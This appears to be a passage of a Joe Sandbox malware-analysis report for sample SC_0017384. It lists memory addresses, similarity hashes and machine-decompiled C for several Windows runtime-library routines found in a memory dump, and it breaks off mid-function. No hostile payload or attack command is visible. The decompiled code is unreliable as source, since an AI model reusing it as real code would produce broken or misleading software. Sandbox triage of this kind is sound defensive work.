                                                                              0x0179fac2
                                                                              0x0179fac8
                                                                              0x0179facd
                                                                              0x0179fad3
                                                                              0x0179fad3
                                                                              0x0179fadd
                                                                              0x0179fb18
                                                                              0x0179fb1b
                                                                              0x0179fb1d
                                                                              0x0179fb1e
                                                                              0x0179fb1f
                                                                              0x0179fb20
                                                                              0x0179fb21
                                                                              0x0179fb22
                                                                              0x0179fb23
                                                                              0x0179fb24
                                                                              0x0179fb25
                                                                              0x0179fb26
                                                                              0x0179fb27
                                                                              0x0179fb28
                                                                              0x0179fb29
                                                                              0x0179fb2a
                                                                              0x0179fb2b
                                                                              0x0179fb2c
                                                                              0x0179fb2d
                                                                              0x0179fb2e
                                                                              0x0179fb2f
                                                                              0x0179fb3a
                                                                              0x0179fb3b
                                                                              0x0179fb3e
                                                                              0x0179fb41
                                                                              0x0179fb44
                                                                              0x0179fb47
                                                                              0x0179fb4a
                                                                              0x0179fb4d
                                                                              0x0179fb53
                                                                              0x017dbdcb
                                                                              0x017dbdcb
                                                                              0x0179fb59
                                                                              0x0179fb5b
                                                                              0x0179fb5b
                                                                              0x0179fb5e
                                                                              0x017dbdd5
                                                                              0x017dbdd8
                                                                              0x00000000
                                                                              0x017dbdda
                                                                              0x00000000
                                                                              0x017dbdda
                                                                              0x0179fb64
                                                                              0x0179fb64
                                                                              0x0179fb64
                                                                              0x0179fb67
                                                                              0x0179fb6e
                                                                              0x0179fb70
                                                                              0x0179fb72
                                                                              0x00000000
                                                                              0x0179fb78
                                                                              0x0179fb7a
                                                                              0x0179fb7a
                                                                              0x0179fb7d
                                                                              0x0179fb80
                                                                              0x017dbddf
                                                                              0x017dbde1
                                                                              0x00000000
                                                                              0x017dbde3
                                                                              0x00000000
                                                                              0x017dbde3
                                                                              0x0179fb86
                                                                              0x0179fb86
                                                                              0x0179fb86
                                                                              0x0179fb8b
                                                                              0x0179fb90
                                                                              0x0179fb92
                                                                              0x0179fb94
                                                                              0x0179fb9a
                                                                              0x0179fb9b
                                                                              0x0179fba1
                                                                              0x017dbde8
                                                                              0x017dbdeb
                                                                              0x017dbded
                                                                              0x017dbeb5
                                                                              0x017dbeb5
                                                                              0x017dbebb
                                                                              0x017dbebd
                                                                              0x017dbec3
                                                                              0x017dbed2
                                                                              0x017dbedd
                                                                              0x017dbedd
                                                                              0x017dbeed
                                                                              0x00000000
                                                                              0x017dbdf3
                                                                              0x017dbdfe
                                                                              0x017dbe06
                                                                              0x017dbe0b
                                                                              0x017dbe0d
                                                                              0x017dbe0f
                                                                              0x017dbe14
                                                                              0x017dbe19
                                                                              0x017dbe20
                                                                              0x017dbe25
                                                                              0x017dbe27
                                                                              0x017dbe35
                                                                              0x017dbe39
                                                                              0x017dbe46
                                                                              0x017dbe4f
                                                                              0x017dbe54
                                                                              0x017dbe56
                                                                              0x017dbef8
                                                                              0x017dbef8
                                                                              0x00000000
                                                                              0x017dbe5c
                                                                              0x017dbe5c
                                                                              0x017dbe60
                                                                              0x00000000
                                                                              0x017dbe66
                                                                              0x017dbe66
                                                                              0x017dbe7f
                                                                              0x017dbe84
                                                                              0x017dbe87
                                                                              0x017dbe89
                                                                              0x017dbe8b
                                                                              0x017dbe99
                                                                              0x017dbe9d
                                                                              0x017dbea0
                                                                              0x017dbeac
                                                                              0x017dbeaf
                                                                              0x017dbeb1
                                                                              0x017dbeb3
                                                                              0x017dbeb3
                                                                              0x00000000
                                                                              0x017dbea2
                                                                              0x017dbea2
                                                                              0x00000000
                                                                              0x017dbea2
                                                                              0x017dbe8d
                                                                              0x017dbe8d
                                                                              0x017dbe92
                                                                              0x00000000
                                                                              0x017dbe92
                                                                              0x017dbe8b
                                                                              0x017dbe60
                                                                              0x017dbe3b
                                                                              0x017dbe3b
                                                                              0x017dbe3e
                                                                              0x00000000
                                                                              0x017dbe40
                                                                              0x017dbe40
                                                                              0x017dbe44
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017dbe44
                                                                              0x017dbe3e
                                                                              0x017dbe29
                                                                              0x017dbe29
                                                                              0x00000000
                                                                              0x017dbe29
                                                                              0x017dbe27
                                                                              0x00000000
                                                                              0x0179fba7
                                                                              0x0179fba7
                                                                              0x0179fbab
                                                                              0x017dbf02
                                                                              0x0179fbb1
                                                                              0x0179fbb1
                                                                              0x0179fbb8
                                                                              0x0179fbbd
                                                                              0x0179fbbd
                                                                              0x0179fbbf
                                                                              0x0179fbbf
                                                                              0x0179fbc5
                                                                              0x0179fbcb
                                                                              0x0179fbf8
                                                                              0x0179fbf8
                                                                              0x0179fbfa
                                                                              0x00000000
                                                                              0x0179fc00
                                                                              0x0179fc00
                                                                              0x0179fc03
                                                                              0x00000000
                                                                              0x0179fc09
                                                                              0x0179fc09
                                                                              0x0179fc0f
                                                                              0x0179fc15
                                                                              0x0179fc23
                                                                              0x0179fc23
                                                                              0x0179fc25
                                                                              0x0179fc27
                                                                              0x0179fc75
                                                                              0x0179fc7c
                                                                              0x0179fc84
                                                                              0x00000000
                                                                              0x0179fc29
                                                                              0x0179fc29
                                                                              0x0179fc2d
                                                                              0x0179fc30
                                                                              0x017dbf0f
                                                                              0x00000000
                                                                              0x0179fc36
                                                                              0x0179fc38
                                                                              0x0179fc3b
                                                                              0x0179fc41
                                                                              0x017dbf17
                                                                              0x017dbf19
                                                                              0x017dbf48
                                                                              0x017dbf4b
                                                                              0x00000000
                                                                              0x017dbf1b
                                                                              0x017dbf22
                                                                              0x017dbf24
                                                                              0x017dbf26
                                                                              0x00000000
                                                                              0x017dbf2c
                                                                              0x017dbf37
                                                                              0x017dbf39
                                                                              0x017dbf3b
                                                                              0x00000000
                                                                              0x017dbf41
                                                                              0x017dbf41
                                                                              0x017dbf41
                                                                              0x017dbf41
                                                                              0x017dbf45
                                                                              0x00000000
                                                                              0x017dbf45
                                                                              0x017dbf3b
                                                                              0x017dbf26
                                                                              0x00000000
                                                                              0x0179fc47
                                                                              0x0179fc47
                                                                              0x0179fc49
                                                                              0x0179fcb2
                                                                              0x0179fcb4
                                                                              0x0179fcb6
                                                                              0x0179fcdc
                                                                              0x0179fcdc
                                                                              0x00000000
                                                                              0x0179fcb8
                                                                              0x0179fcc3
                                                                              0x0179fcc5
                                                                              0x0179fcc7
                                                                              0x00000000
                                                                              0x0179fcc9
                                                                              0x0179fcc9
                                                                              0x0179fccd
                                                                              0x00000000
                                                                              0x0179fccd
                                                                              0x0179fcc7
                                                                              0x00000000
                                                                              0x0179fc4b
                                                                              0x0179fc4b
                                                                              0x0179fc4e
                                                                              0x0179fc4e
                                                                              0x0179fc51
                                                                              0x0179fc51
                                                                              0x0179fc54
                                                                              0x0179fc5a
                                                                              0x0179fc5c
                                                                              0x0179fc5f
                                                                              0x0179fc61
                                                                              0x0179fc63
                                                                              0x0179fc65
                                                                              0x0179fc67
                                                                              0x0179fc6e
                                                                              0x0179fc72
                                                                              0x0179fc72
                                                                              0x0179fc72
                                                                              0x0179fc72
                                                                              0x0179fc67
                                                                              0x0179fc61
                                                                              0x00000000
                                                                              0x0179fc5a
                                                                              0x0179fc49
                                                                              0x0179fc41
                                                                              0x0179fc30
                                                                              0x0179fc27
                                                                              0x0179fc03
                                                                              0x0179fbcd
                                                                              0x0179fbd3
                                                                              0x0179fbd9
                                                                              0x0179fbdc
                                                                              0x0179fbde
                                                                              0x0179fc99
                                                                              0x0179fc9b
                                                                              0x0179fc9d
                                                                              0x0179fcd5
                                                                              0x0179fcd5
                                                                              0x0179fc89
                                                                              0x0179fc89
                                                                              0x00000000
                                                                              0x0179fc9f
                                                                              0x0179fc9f
                                                                              0x0179fca3
                                                                              0x00000000
                                                                              0x0179fca3
                                                                              0x00000000
                                                                              0x0179fbe4
                                                                              0x0179fbe4
                                                                              0x0179fbe4
                                                                              0x0179fbe4
                                                                              0x0179fbe9
                                                                              0x0179fbf2
                                                                              0x00000000
                                                                              0x0179fbf2
                                                                              0x0179fbde
                                                                              0x0179fbcb
                                                                              0x0179fbab
                                                                              0x0179fc8b
                                                                              0x0179fc8b
                                                                              0x0179fc8c
                                                                              0x0179fb80
                                                                              0x0179fb72
                                                                              0x0179fb5e
                                                                              0x0179fc8d
                                                                              0x0179fc91
                                                                              0x0179fadf
                                                                              0x0179fadf
                                                                              0x0179fae1
                                                                              0x0179fae4
                                                                              0x0179fae7
                                                                              0x0179faec
                                                                              0x0179faf8
                                                                              0x0179fb00
                                                                              0x0179fb07
                                                                              0x0179fb0f
                                                                              0x0179fb0f
                                                                              0x0179fb07
                                                                              0x00000000
                                                                              0x0179faf8
                                                                              0x0179fadd

                                                                              Strings
                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 017DBE0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                              • API String ID: 0-865735534
                                                                              • Opcode ID: 582f95d2fa2de850c8cbfe2ad90d5529f9737fe571900674f5a078eb611e671a
                                                                              • Instruction ID: 21f46cde62df3de4ec3f1a36f25c5b7e22bb374042773b6f71998992b64b970d
                                                                              • Opcode Fuzzy Hash: 582f95d2fa2de850c8cbfe2ad90d5529f9737fe571900674f5a078eb611e671a
                                                                              • Instruction Fuzzy Hash: 77A12631B006468BEF25DF68D454B7AFBB5AF4A710F05856AEA06CB681DB30D849CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01762D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 63%
                                                                              			E01762D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1855350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1857bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017A97C0();
				}
				if( *0x18579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01791624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01787D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E017FFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017A9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0179E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L017BDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1856901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1856901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017A9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017A95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01787D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01787D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E017E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E017FFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1855350;
							if(_t109 != 0x1855350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E017FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E017F5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                              0x01762d8a
                                                                              0x01762d8a
                                                                              0x01762d92
                                                                              0x01762d96
                                                                              0x01762d9e
                                                                              0x01762da0
                                                                              0x01762da3
                                                                              0x01762da5
                                                                              0x01762da8
                                                                              0x01762dab
                                                                              0x01762db2
                                                                              0x017bf9aa
                                                                              0x017bf9ab
                                                                              0x017bf9ae
                                                                              0x017bf9ae
                                                                              0x01762db8
                                                                              0x01762dc2
                                                                              0x017bf9b9
                                                                              0x017bf9be
                                                                              0x017bf9bf
                                                                              0x017bf9bf
                                                                              0x01762dcf
                                                                              0x017bf9c9
                                                                              0x01762dd5
                                                                              0x01762dd5
                                                                              0x01762dd5
                                                                              0x01762dde
                                                                              0x01762de1
                                                                              0x01762e70
                                                                              0x01762e72
                                                                              0x01762e72
                                                                              0x01762de7
                                                                              0x01762deb
                                                                              0x01762e7c
                                                                              0x01762e83
                                                                              0x01762e85
                                                                              0x01762e8b
                                                                              0x01762e8d
                                                                              0x01762e92
                                                                              0x01762e92
                                                                              0x01762e85
                                                                              0x01762df1
                                                                              0x01762df7
                                                                              0x01762df9
                                                                              0x01762df9
                                                                              0x01762dfc
                                                                              0x01762dff
                                                                              0x01762e02
                                                                              0x00000000
                                                                              0x01762e05
                                                                              0x01762e0c
                                                                              0x017bf9d9
                                                                              0x01762e12
                                                                              0x01762e12
                                                                              0x01762e12
                                                                              0x01762e1a
                                                                              0x017bf9e3
                                                                              0x017bf9e9
                                                                              0x017bf9f0
                                                                              0x017bf9f6
                                                                              0x017bf9f8
                                                                              0x017bf9f8
                                                                              0x017bf9f0
                                                                              0x01762e23
                                                                              0x017bfa02
                                                                              0x017bfa03
                                                                              0x017bfa05
                                                                              0x017bfa06
                                                                              0x00000000
                                                                              0x01762e29
                                                                              0x01762e29
                                                                              0x01762e2e
                                                                              0x01762e34
                                                                              0x01762e3e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762e44
                                                                              0x01762e47
                                                                              0x01762e4d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762e4f
                                                                              0x01762e54
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01762e5a
                                                                              0x01762e5f
                                                                              0x01762e9a
                                                                              0x01762ea4
                                                                              0x01762ea5
                                                                              0x01762ea8
                                                                              0x01762eaf
                                                                              0x01762eb2
                                                                              0x01762eb5
                                                                              0x017bfae9
                                                                              0x017bfaeb
                                                                              0x017bfaed
                                                                              0x017bfaef
                                                                              0x017bfaf7
                                                                              0x017bfaf8
                                                                              0x017bfafd
                                                                              0x017bfaff
                                                                              0x017bfb04
                                                                              0x017bfb04
                                                                              0x017bfaff
                                                                              0x01762ec0
                                                                              0x01762ec4
                                                                              0x01762ec6
                                                                              0x01762ec8
                                                                              0x017bfb14
                                                                              0x017bfb18
                                                                              0x017bfb1e
                                                                              0x017bfb21
                                                                              0x017bfb21
                                                                              0x01762ece
                                                                              0x01762ece
                                                                              0x01762ece
                                                                              0x01762ed7
                                                                              0x01762e61
                                                                              0x01762e63
                                                                              0x017bfa6b
                                                                              0x017bfa71
                                                                              0x017bfa76
                                                                              0x017bfa78
                                                                              0x017bfa8a
                                                                              0x017bfa7a
                                                                              0x017bfa83
                                                                              0x017bfa83
                                                                              0x017bfa8f
                                                                              0x017bfa91
                                                                              0x017bfa97
                                                                              0x017bfa9d
                                                                              0x017bfaa4
                                                                              0x017bfaaa
                                                                              0x017bfaaf
                                                                              0x017bfab1
                                                                              0x017bfac3
                                                                              0x017bfab3
                                                                              0x017bfabc
                                                                              0x017bfabc
                                                                              0x017bfac8
                                                                              0x017bfacb
                                                                              0x017bfadf
                                                                              0x017bfadf
                                                                              0x017bfacb
                                                                              0x017bfaa4
                                                                              0x017bfa91
                                                                              0x01762e6f
                                                                              0x01762e6f
                                                                              0x01762e5f
                                                                              0x017bfa13
                                                                              0x017bfa15
                                                                              0x017bfa17
                                                                              0x017bfa1f
                                                                              0x017bfa21
                                                                              0x017bfa22
                                                                              0x017bfa25
                                                                              0x017bfa28
                                                                              0x017bfa2f
                                                                              0x017bfa2f
                                                                              0x017bfa2a
                                                                              0x017bfa2a
                                                                              0x017bfa2a
                                                                              0x017bfa31
                                                                              0x017bfa34
                                                                              0x017bfa36
                                                                              0x017bfa3c
                                                                              0x017bfa3e
                                                                              0x017bfa41
                                                                              0x017bfa43
                                                                              0x017bfa45
                                                                              0x017bfa45
                                                                              0x017bfa41
                                                                              0x017bfa3c
                                                                              0x017bfa4a
                                                                              0x017bfa4f
                                                                              0x017bfa51
                                                                              0x017bfa53
                                                                              0x017bfa56
                                                                              0x017bfa5b
                                                                              0x017bfa5e
                                                                              0x00000000
                                                                              0x017bfa5e
                                                                              0x01762e23

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Re-Waiting
                                                                              • API String ID: 0-316354757
                                                                              • Opcode ID: b732dfa79258d0028413c0a023405a1dfc7600d4577aae6ee48a8a20830d0a9a
                                                                              • Instruction ID: a21594121ca9b12b0a902dcf76103482bc93328741f72ab77fe1b21b8e880277
                                                                              • Opcode Fuzzy Hash: b732dfa79258d0028413c0a023405a1dfc7600d4577aae6ee48a8a20830d0a9a
                                                                              • Instruction Fuzzy Hash: 43613971A00605AFDB36DF6CCC88BBEFBE9EB45B14F1446A9DA11972C2C7349A40C791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01830EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E01830EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0182FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01831074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E017A9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0182A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0182A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1858b04 >> 0x14) + (_v44 -  *0x1858b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01787D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0182138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01787D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0181FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1858724 & 0x00000008) != 0) {
						E018252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018315B5(0x1858ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                              0x01830eb7
                                                                              0x01830eb9
                                                                              0x01830ec0
                                                                              0x01830ec2
                                                                              0x01830ecd
                                                                              0x0183105b
                                                                              0x0183105b
                                                                              0x01831061
                                                                              0x01831066
                                                                              0x01831066
                                                                              0x0183106b
                                                                              0x01831073
                                                                              0x01831073
                                                                              0x01830ed3
                                                                              0x01830ed6
                                                                              0x01830edc
                                                                              0x01830ee0
                                                                              0x01830ee7
                                                                              0x01830ef0
                                                                              0x01830ef5
                                                                              0x01830efa
                                                                              0x01830efc
                                                                              0x01830efd
                                                                              0x01830f03
                                                                              0x01830f04
                                                                              0x01830f06
                                                                              0x01830f07
                                                                              0x01830f09
                                                                              0x01830f0e
                                                                              0x01830f14
                                                                              0x01830f23
                                                                              0x01830f2d
                                                                              0x01830f34
                                                                              0x01830f34
                                                                              0x01830f14
                                                                              0x01830f52
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01830f58
                                                                              0x01830f73
                                                                              0x01830f74
                                                                              0x01830f79
                                                                              0x01830f7d
                                                                              0x01830f80
                                                                              0x01830f86
                                                                              0x01830fab
                                                                              0x01830fb5
                                                                              0x01830fc6
                                                                              0x01830fd1
                                                                              0x01830fe3
                                                                              0x01830fd3
                                                                              0x01830fdc
                                                                              0x01830fdc
                                                                              0x01830feb
                                                                              0x01831009
                                                                              0x01831009
                                                                              0x01831015
                                                                              0x01831027
                                                                              0x01831017
                                                                              0x01831020
                                                                              0x01831020
                                                                              0x0183102f
                                                                              0x0183103c
                                                                              0x0183103c
                                                                              0x01831048
                                                                              0x01831050
                                                                              0x01831050
                                                                              0x01831055
                                                                              0x00000000
                                                                              0x01831055
                                                                              0x01830f88
                                                                              0x01830f9e
                                                                              0x01830fa2
                                                                              0x01830fa9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01830fa9
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `
                                                                              • API String ID: 0-2679148245
                                                                              • Opcode ID: e37a6bf45a15a475e5d9927d23a0d48b551b9e2d80778e6d718fd53357be73e0
                                                                              • Instruction ID: 46088f32e186c0264c096c548eeec64e6732ac214b2b9ca961db056ae3d3ecaf
                                                                              • Opcode Fuzzy Hash: e37a6bf45a15a475e5d9927d23a0d48b551b9e2d80778e6d718fd53357be73e0
                                                                              • Instruction Fuzzy Hash: BA51B1713083429FD325DF28D894B1BBBE5EBC4704F08092DFA96D7291D671EA45CBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E0179F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01784120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017A9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017A9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017A95D0();
							goto L11;
						} else {
							_t109 = L01784620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017A95D0();
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
